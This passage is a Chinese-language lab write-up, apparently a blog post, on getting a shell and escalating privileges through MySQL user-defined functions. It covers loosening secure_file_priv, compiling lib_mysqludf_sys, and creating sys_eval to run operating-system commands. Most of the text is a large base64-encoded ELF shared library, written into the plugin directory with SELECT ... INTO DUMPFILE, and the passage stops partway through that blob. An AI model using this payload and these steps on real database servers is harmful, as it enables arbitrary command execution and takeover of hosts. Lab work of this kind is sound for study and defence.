网上有很多在mysql中通过udf提权或者getshell的教程,但在我实验过程中遇到了很多阻碍,所以用这篇文章记录下我克服种种困难完成实验的过程
实验
实验环境
ubuntu18.04
mysql5.7
将secure_file_priv设置为空
进入mysql命令行,先执行SHOW VARIABLES LIKE "secure_file_priv";
默认为null,就是不能对任意文件夹下的文件进行读写操作。
修改/etc/mysql/cmy.cnf文件,在文件的末尾添加如下内容,然后执行service mysql restart重启mysql服务
[mysqld]
secure_file_priv=
此时再执行SHOW VARIABLES LIKE "secure_file_priv"; ,结果就会为空
此时代表着能在有权限的任意文件夹下读写文件
写入.so文件
执行show variables like 'plugin_dir';或者select @@plugin_dir; 查询mysql插件目录,找到要上传恶意.so文件的目录
默认plugin文件夹只有root用户有可写权限
查询mysql所在系统和系统位数以选择相应payload
select @@version_compile_os, @@version_compile_machine;
不同系统下的udf文件:https://github.com/mysqludf/lib_mysqludf_sys
法一:直接将文件复制过去
从github上将文件下载下来后,将lib_mysqludf_sys.so拷贝到plugin_dir目录下,需要root权限(假设你想用udf提权,普通用户没有权限将.so文件放到plugin_dir目录下,自然也就没有办法提权成功)
执行mysql语句create function sys_eval returns string soname 'lib_mysqludf_sys.so'
失败了,目测是这个.so文件不太行,所以我们自己编译。
把上面github中下载的Makefile和lib_mysqludf_sys.c放在同一个目录下。把Makefile文件内容改成下面的内容
nstall:
gcc -Wall -I/usr/include/mysql -I. -shared -fPIC lib_mysqludf_sys.c -o ./lib_mysqludf_sys.so
在该目录下运行make,得到lib_mysqludf_sys.so文件。如果报错,可能是少装了libmysqlclient-dev,装上就行:sudo apt install libmysqlclient-dev,装完再编译
将自己编译的lib_mysqludf_sys.so复制到plugin_dir目录下,再执行sql语句
此时成功创建了sys_eval函数,执行命令
当然,并没有这么顺利。一开始执行命令发现并没有回显内容,经过判断,确实是没有成功执行命令。原因是apparmor,下面有写绕过的方法
法二:通过select into outfile写入文件
直接通过select xxx into outfile 往plugin_dir目录写入文件会显示权限不足,所以无法通过这个方法写入.so文件,自然也就无法通过udf来getshell或者提权
为了完成实验,修改plugin_dir目录权限为777
先将文件转换为16进制或者base64,再用select 'XXX' into dumpfile将16进制的文件写入plugin_dir。这儿不用select 'XXX' into outfile 是因为outfile函数可以导出多行,而dumpfile只能导出一行数据。outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式。如果用outfile原来的文件格式就变了,所以得用dumpfile。
16进制失败了,可能是我转换的不太对,所以我用了base64做实验
执行如下命令写入文件:
select "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TeBIi0XwSItAEEiLAEiJx+h3+f//SJjJw1VIieVIiX3oSIl14EiJVdjHRfwAAAAASItF4IsAg/gBdR9Ii0XgSItACItV/EjB4gJIAdCLAIXAdQe4AAAAAOtYSItF2Ei+RXhwZWN0ZWRIvyBleGFjdGx5SIkwSIl4CEi+IG9uZSBzdHJIv2luZyB0eXBlSIlwEEiJeBhIuSBwYXJhbWV0SIlIIGbHQChlcsZAKgC4AQAAAF3DVUiJ5UiJffiQXcNVSInlSIHsYAQAAEiJvcj7//9IibXA+///SImVuPv//0iJjbD7//9MiYWo+///TImNoPv//2RIiwQlKAAAAEiJRfgxwL8BAAAA6L/4//9IiYW4+///SMeF2Pv//wAAAABIi4XA+///SItAEEiLAEiNNTkBAABIicfosPj//0iJheD7///reUiNhfD7//9IicfoGPj//0iJhej7//9Ii5XY+///SIuF6Pv//0gBwkiLhbj7//9IidZIicfoXvj//0iJhbj7//9Ii5W4+///SIuF2Pv//0iNDAJIi5Xo+///SI2F8Pv//0iJxkiJz+ic9///SIuF6Pv//0gBhdj7//9Ii5Xg+///SI2F8Pv//74ABAAASInH6NP3//9IhcAPhWP///9Ii4Xg+///SInH6Kv3//9Ii4W4+///D7YAhMB0CkiDvbj7//8AdQxIi4Wo+///xgAB6zBIi5W4+///SIuF2Pv//0gB0MYAAEiLhbj7//9IicfoNPf//0iJwkiLhbD7//9IiRBIi4W4+///SItN+GRIMwwlKAAAAHQF6Bz3///JwwAASIPsCEiDxAjDcgAAARsDO5AAAAARAAAArPb//6wAAACM9///1AAAAHb4///sAAAA/fj//wwBAAAI+f//LAEAAHP5//9MAQAABPr//2wBAAAP+v//jAEAAHL6//+sAQAAzvv//8wBAAD6+///7AEAANT8//8MAgAAb/3//ywCAAB6/f//TAIAAKn9//9sAgAARP7//4wCAABP/v//rAIAABQAAAAAAAAAAXpSAAF4EAEbDAcIkAEAACQAAAAcAAAA+PX//+AAAAAADhBGDhhKDwt3CIAAPxo7KjMkIgAAAAAUAAAARAAAALD2//8IAAAAAAAAAAAAAAAcAAAAXAAAAIL3//+HAAAAAEEOEIYCQw0GAoIMBwgAABwAAAB8AAAA6ff//wsAAAAAQQ4QhgJDDQZGDAcIAAAAHAAAAJwAAADU9///awAAAABBDhCGAkMNBgJmDAcIAAAcAAAAvAAAAB/4//+RAAAAAEEOEIYCQw0GAowMBwgAABwAAADcAAAAkPj//wsAAAAAQQ4QhgJDDQZGDAcIAAAAHAAAAPwAAAB7+P//YwAAAABBDhCGAkMNBgJeDAcIAAAcAAAAHAEAAL74//9cAQAAAEEOEIYCQw0GA1cBDAcIABwAAAA8AQAA+vn//ywAAAAAQQ4QhgJDDQZnDAcIAAAAHAAAAFwBAAAG+v//2gAAAABBDhCGAkMNBgLVDAcIAAAcAAAAfAEAAMD6//+bAAAAAEEOEIYCQw0GApYMBwgAABwAAACcAQAAO/v//wsAAAAAQQ4QhgJDDQZGDAcIAAAAHAAAALwBAAAm+///LwAAAABBDhCGAkMNBmoMBwgAAAAcAAAA3AEAADX7//+bAAAAAEEOEIYCQw0GApYMBwgAABwAAAD8AQAAsPv//wsAAAAAQQ4QhgJDDQZGDAcIAAAAHAAAABwCAACb+///owEAAABBDhCGAkMNBgOeAQwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAMAAAAAAAAMAwAAAAAAAABAAAAAAAAAKIBAAAAAAAADAAAAAAAAACQCgAAAAAAAA0AAAAAAAAA+BMAAAAAAAAZAAAAAAAAABAeIAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGB4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAOAYAAAAAAAAGAAAAAAAAAKgCAAAAAAAACgAAAAAAAADlAQAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAgIAAAAAAAAgAAAAAAAAA4AQAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAFgJAAAAAAAABwAAAAAAAACwCAAAAAAAAAgAAAAAAAAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABwCAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAB4IAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAcgIAABIADAABDQAAAAAAAAsAAAAAAAAAjwIAABIADAB2DgAAAAAAAFwBAAAAAAAAnAIAABAAFwCQICAAAAAAAAAAAAAAAAAAoQIAABIADABIEgAAAAAAAAsAAAAAAAAAsQIAABIAAAAAAAAAAAAAAAAAAAAAAAAAxgIAABAAFwCIICAAAAAAAAAAAAAAAAAA0gIAABIAAAAAAAAAAAAAAAAAAAAAAAAA5QIAABIADADSDwAAAAAAACwAAAAAAAAA9AIAABIADABzEQAAAAAAAAsAAAAAAAAABAMAABIADACtEQAAAAAAAJsAAAAAAAAAEgMAABIADAB3DQAAAAAAAJEAAAAAAAAAHwMAACAAAAAAAAAAAAAAAAAAAAAAAAAAOQMAACIAAAAAAAAAAAAAAAAAAAAAAAAAewEAABIACQCQCgAAAAAAAAAAAAAAAAAAVQMAABIADAB6DAAAAAAAAIcAAAAAAAAAAGNydHN0dWZmLmMAZGVyZWdpc3Rlcl90bV9jbG9uZXMAX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC43Njk4AF9fZG9fZ2xvYmFsX2R0b3JzX2F1eF9maW5pX2FycmF5X2VudHJ5AGZyYW1lX2R1bW15AF9fZnJhbWVfZHVtbXlfaW5pdF9hcnJheV9lbnRyeQBsaWJfbXlzcWx1ZGZfc3lzLmMAX19GUkFNRV9FTkRfXwBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBnZXRlbnZAQEdMSUJDXzIuMi41AGZyZWVAQEdMSUJDXzIuMi41AHN0cm5jcHlAQEdMSUJDXzIuMi41AF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBzeXNfZ2V0X2RlaW5pdABzeXNfZXhlYwBzeXNfZXhlY19pbml0AHNldGVudkBAR0xJQkNfMi4yLjUAX2VkYXRhAF9maW5pAHN0cmxlbkBAR0xJQkNfMi4yLjUAX19zdGFja19jaGtfZmFpbEBAR0xJQkNfMi40AHN5c3RlbUBAR0xJQkNfMi4yLjUAcGNsb3NlQEBHTElCQ18yLjIuNQB